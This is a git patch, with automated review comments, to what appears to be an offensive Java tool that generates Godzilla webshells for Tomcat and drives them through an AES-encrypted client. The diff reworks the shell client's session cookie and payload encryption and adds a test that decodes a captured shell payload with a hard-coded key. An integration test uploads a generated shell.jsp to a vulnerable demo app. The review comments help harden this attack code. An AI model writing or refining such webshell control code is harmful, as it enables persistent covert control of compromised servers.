From 272188a83d8ce889ba72a859ca514d7e41b47dba Mon Sep 17 00:00:00 2001
From: ReaJason
Date: Wed, 27 Nov 2024 01:17:08 +0800
Subject: [PATCH] fix: godzilla manager test failed
---
 .../javaweb/godzilla/GodzillaManager.java | 50 +++++++++++--------
 .../javaweb/godzilla/GodzillaManagerTest.java | 10 ++++
 .../TomcatGodzillaIntegrationTest.java | 6 +--
 vul-webapp/src/main/webapp/WEB-INF/web.xml | 16 +++---
 4 files changed, 50 insertions(+), 32 deletions(-)
diff --git a/generator/src/main/java/com/reajason/javaweb/godzilla/GodzillaManager.java b/generator/src/main/java/com/reajason/javaweb/godzilla/GodzillaManager.java
index f0d2c2b..238846c 100644
--- a/generator/src/main/java/com/reajason/javaweb/godzilla/GodzillaManager.java
+++ b/generator/src/main/java/com/reajason/javaweb/godzilla/GodzillaManager.java
@@ -29,7 +29,7 @@ public class GodzillaManager implements Closeable {
 private final OkHttpClient client;
 private static final List CLASS_NAMES;
- private String J_SESSION_ID = "";
+ private String cookie = "";
 private String entrypoint;
 private String key;
 private String pass;
@@ -96,18 +96,18 @@ public GodzillaManager() {
 }
 private Response post(byte[] bytes) throws IOException {
- byte[] aes = aes(bytes, true);
+ byte[] aes = aes(this.key, bytes, true);
 assert aes != null;
 String base64String = Base64.encodeBase64String(aes);
 RequestBody requestBody = new FormBody.Builder()
- .add("pass", base64String)
+ .add(this.pass, base64String)
 .build();
 Request.Builder builder = new Request.Builder()
 .url(this.entrypoint)
 .post(requestBody)
 .headers(Headers.of(this.headers));
- if (StringUtils.isNotBlank(J_SESSION_ID)) {
- builder.header("Cookie", J_SESSION_ID);
+ if (StringUtils.isNotBlank(cookie)) {
+ builder.header("Cookie", cookie);
 }
 return client.newCall(builder.build()).execute();
 }
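Review bot: The `assert aes != null;` kept in post() can no longer fire, because the aes() hunk further down (`@@ -172,15 +171,13 @@`) now returns `new byte[0]` on any cipher failure instead of null, so a bad key or input is posted as an empty form value with no signal to the caller. The same silent empty array reaches `new GZIPInputStream(...)` in getResultFromRes() and the parser in restorePayload() (hunk `@@ -188,23 +185,34 @@`). I would replace the assert with an explicit check such as `if (aes.length == 0) throw new IOException("AES encryption failed");`, or have aes() propagate the exception instead of swallowing it. post() lies entirely inside this hunk; its callers are not visible.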
@@ -128,7 +128,7 @@ public boolean start() {
 try (Response response = post(bytes)) {
 String setCookie = response.header("Set-Cookie");
 if (setCookie != null && setCookie.contains("JSESSIONID=")) {
- J_SESSION_ID = setCookie.substring(setCookie.indexOf("JSESSIONID="), setCookie.indexOf(";"));
+ cookie = setCookie.substring(setCookie.indexOf("JSESSIONID="), setCookie.indexOf(";"));
 }
 return response.code() == 200;
 } catch (IOException e) {
@@ -148,7 +148,6 @@ public boolean test() {
 }
 return false;
 } catch (IOException e) {
- e.printStackTrace();
 return false;
 }
 }
@@ -172,15 +171,13 @@ public void close() throws IOException {
 * @param encoding 是否为加密,true 为加密,false 解密
 * @return 返回加解密后的字节数组
 */
- public byte[] aes(byte[] bytes, boolean encoding) {
- System.out.println(key);
+ public static byte[] aes(String key, byte[] bytes, boolean encoding) {
 try {
 Cipher c = Cipher.getInstance("AES");
- c.init(encoding ? 1 : 2, new SecretKeySpec(this.key.getBytes(), "AES"));
+ c.init(encoding ? 1 : 2, new SecretKeySpec(key.getBytes(), "AES"));
 return c.doFinal(bytes);
 } catch (Exception e) {
- e.printStackTrace();
- return null;
+ return new byte[0];
 }
 }
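Review bot: The `substring` call on the renamed `cookie` line throws StringIndexOutOfBoundsException when the Set-Cookie value has no `;` (indexOf returns -1) or has a `;` before `JSESSIONID=`, and the surrounding catch only handles IOException. Compute the end relative to the start instead: `int s = setCookie.indexOf("JSESSIONID="); int e = setCookie.indexOf(';', s); cookie = e < 0 ? setCookie.substring(s) : setCookie.substring(s, e);`. `response.header("Set-Cookie")` yields a single value, so when the server sends several Set-Cookie headers the session cookie can be missed; iterating `response.headers("Set-Cookie")` would cover that. start() begins and ends outside the hunk.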
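Review bot: `Cipher.getInstance("AES")` in the now-static aes() leaves mode and padding to the provider default (ECB with PKCS5 padding on the standard JDK providers) and `key.getBytes()` uses the platform charset, so the output depends on the runtime rather than on the code. Spell them out as `Cipher.getInstance("AES/ECB/PKCS5Padding")`, `key.getBytes(StandardCharsets.UTF_8)` and `encoding ? Cipher.ENCRYPT_MODE : Cipher.DECRYPT_MODE`, with a comment that ECB is deterministic and is kept only for compatibility with the peer, if that is indeed the reason. The Javadoc lines visible above the signature cover `encoding` and the return value; it probably needs a `@param key` entry now that the key is an argument, and `@return` should mention the empty array returned on failure. The same default-charset `getBytes()` calls appear in generateMethodCallBytes (hunk `@@ -249,7 +257,7 @@`).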
@@ -188,23 +185,34 @@ private boolean isValidResponse(String response) {
 if (StringUtils.isEmpty(response)) {
 return false;
 }
- return response.startsWith(md5.substring(0, 16)) && response.endsWith(md5.substring(16));
+ return response.length() > 32 && response.startsWith(md5.substring(0, 16)) && response.endsWith(md5.substring(16));
 }
 public String getResultFromRes(String responseBody) throws IOException {
+ if (!isValidResponse(responseBody)) {
+ return responseBody;
+ }
 String result = responseBody.substring(16);
 result = result.substring(0, result.length() - 16);
 byte[] bytes = Base64.decodeBase64(result);
- byte[] x = aes(bytes, false);
+ byte[] x = aes(this.key, bytes, false);
 GZIPInputStream gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(x));
 return IOUtils.toString(gzipInputStream, StandardCharsets.UTF_8);
 }
- Map restorePayload(String payload) throws IOException {
- String p = URLDecoder.decode(payload, "UTF-8");
+ public static Map restorePayload(String key, String payload) {
+ String p = payload;
+ try {
+ String urlDecoded = URLDecoder.decode(payload, "UTF-8");
+ if (StringUtils.isNoneBlank(urlDecoded)) {
+ p = urlDecoded;
+ }
+ } catch (UnsupportedEncodingException ignored) {
+
+ }
 Map map = new HashMap<>();
 byte[] bytes = Base64.decodeBase64(p);
- byte[] x = aes(bytes, false);
+ byte[] x = aes(key, bytes, false);
 ByteArrayInputStream tStream = new ByteArrayInputStream(x);
 ByteArrayOutputStream tp = new ByteArrayOutputStream();
 byte[] lenB = new byte[4];
@@ -215,8 +223,8 @@ Map restorePayload(String payload) throws IOException {
 byte t = (byte) inputStream.read();
 if (t != -1) {
 if (t == 2) {
- String key = tp.toString();
- int read1 = inputStream.read(lenB);
+ String dataKey = tp.toString();
+ inputStream.read(lenB);
 int len = bytesToInt(lenB);
 byte[] data = new byte[len];
 int readOneLen = 0;
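Review bot: In restorePayload() the fallback to the raw `payload` never takes effect for the inputs it seems meant for: `URLDecoder.decode(payload, "UTF-8")` cannot throw UnsupportedEncodingException for UTF-8, but it does throw IllegalArgumentException on a stray `%`, and on a payload that is already plain Base64 it turns each `+` into a space, which `Base64.decodeBase64` (presumably commons-codec) then skips, corrupting the bytes. Base64 never contains `%`, so decode only when one is present, `String p = payload.indexOf('%') >= 0 ? URLDecoder.decode(payload, "UTF-8") : payload;`, and catch IllegalArgumentException as well. The empty catch block should carry a comment saying why the exception is ignored. restorePayload() continues past the end of this hunk.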
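Review bot: `len` is taken from the decoded payload and passed to `new byte[len]` unchecked, and the return value of `inputStream.read(lenB)` is now discarded, so a truncated or malformed payload leads to a NegativeArraySizeException, a very large allocation, or a length built from stale bytes. Since this patch makes restorePayload() public and static, bound the length before allocating, e.g. `if (len < 0 || len > MAX_FIELD_LEN) throw new IllegalArgumentException("bad field length");`, where MAX_FIELD_LEN is a limit the project would have to define. The fill loop in the next hunk (`@@ -224,7 +232,7 @@`) adds the result of `read(...)` without checking for -1, so at end of stream the counter moves backwards and the loop appears to end only through an exception; `IOUtils.readFully(inputStream, lenB)` and `IOUtils.readFully(inputStream, data)` would cover both reads, assuming the `IOUtils` already used in this file is commons-io. The enclosing loop and the declaration of `inputStream` are outside the hunk.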
@@ -224,7 +232,7 @@ Map restorePayload(String payload) throws IOException {
 read = readOneLen + inputStream.read(data, readOneLen, data.length - readOneLen);
 readOneLen = read;
 } while (read < data.length);
- map.put(key, new String(data));
+ map.put(dataKey, new String(data));
 tp.reset();
 } else {
 tp.write(t);
@@ -249,7 +257,7 @@ public static int bytesToInt(byte[] bytes) {
 private byte[] generateMethodCallBytes(String methodName) {
 ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
 try (GZIPOutputStream gzipOutputStream = new GZIPOutputStream(byteArrayOutputStream);) {
- byte[] value = "close".getBytes();
+ byte[] value = methodName.getBytes();
 gzipOutputStream.write("methodName".getBytes());
 gzipOutputStream.write(2);
 gzipOutputStream.write(intToBytes(value.length));
diff --git a/generator/src/test/java/com/reajason/javaweb/godzilla/GodzillaManagerTest.java b/generator/src/test/java/com/reajason/javaweb/godzilla/GodzillaManagerTest.java
index c38e5aa..13eb13e 100644
--- a/generator/src/test/java/com/reajason/javaweb/godzilla/GodzillaManagerTest.java
+++ b/generator/src/test/java/com/reajason/javaweb/godzilla/GodzillaManagerTest.java
@@ -3,6 +3,8 @@ import com.reajason.javaweb.util.ClassUtils;
 import org.junit.jupiter.api.Test;
+import java.util.Map;
+
 import static org.junit.jupiter.api.Assertions.*;
 /**
@@ -18,4 +20,12 @@ void generateGodzilla() {
 System.out.println(o.getClass().getName());
 assertNotNull(o);
 }
+
+ @Test
+ void testRestorePayload(){
+ String payload = "k2qs7l3%2F4ZZaGyyrfpBQGg0dXGM%2BFVFxzmCWLnyFEgoPSpSjHre4o1HBHTCFnNDX";
+ String key = "d8ea7326e6ec5916";
+ Map map = GodzillaManager.restorePayload(key, payload);
+ assertEquals("test", map.get("methodName"));
+ }
 }
\ No newline at end of file
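Review bot: testRestorePayload() covers only a well-formed, URL-encoded payload decrypted with the matching key. restorePayload() now swallows decoding and cipher failures, so add cases that pin what it returns for a wrong key, for input that is not Base64, and for a plain Base64 payload containing `+`; without them a regression in the fallback path would pass unnoticed. The test class starts outside this hunk.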
diff --git a/generator/src/test/java/com/reajason/javaweb/memsell/tomcat/godzilla/TomcatGodzillaIntegrationTest.java b/generator/src/test/java/com/reajason/javaweb/memsell/tomcat/godzilla/TomcatGodzillaIntegrationTest.java
index ddb286a..ef36d62 100644
--- a/generator/src/test/java/com/reajason/javaweb/memsell/tomcat/godzilla/TomcatGodzillaIntegrationTest.java
+++ b/generator/src/test/java/com/reajason/javaweb/memsell/tomcat/godzilla/TomcatGodzillaIntegrationTest.java
@@ -52,8 +52,8 @@ private DynamicTest createCustomContainerTest(String imageName) {
 int port = container.getMappedPort(8080);
 String url = "http://" + host + ":" + port + "/app";
 GodzillaShellConfig shellConfig = GodzillaShellConfig.builder()
- .pass("pass").key("key")
- .headerName("User-Agent").headerValue("test")
+ .pass("pass123").key("key123")
+ .headerName("User-Agent").headerValue("hello_integration_test")
 .build();
 String jspContent = generateGodzillaFilterJsp(shellConfig);
 String filename = "shell.jsp";
@@ -99,7 +99,7 @@ private void uploadJspFileToServer(String uploadUrl, String filename, String fil
 }
 private void testGodzillaIsOk(String entrypoint, GodzillaShellConfig shellConfig) {
- try (GodzillaManager godzillaManager = new GodzillaManager.GodzillaManagerBuilder()
+ try (GodzillaManager godzillaManager = GodzillaManager.builder()
 .entrypoint(entrypoint)
 .pass(shellConfig.getPass())
 .key(shellConfig.getKey())
diff --git a/vul-webapp/src/main/webapp/WEB-INF/web.xml b/vul-webapp/src/main/webapp/WEB-INF/web.xml
index bff571d..9fa4775 100644
--- a/vul-webapp/src/main/webapp/WEB-INF/web.xml
+++ b/vul-webapp/src/main/webapp/WEB-INF/web.xml
@@ -24,12 +24,12 @@ /upload - - godzilla - ErrorHandler - - - godzilla - /test_filter - + + + + + + + +
\ No newline at end of file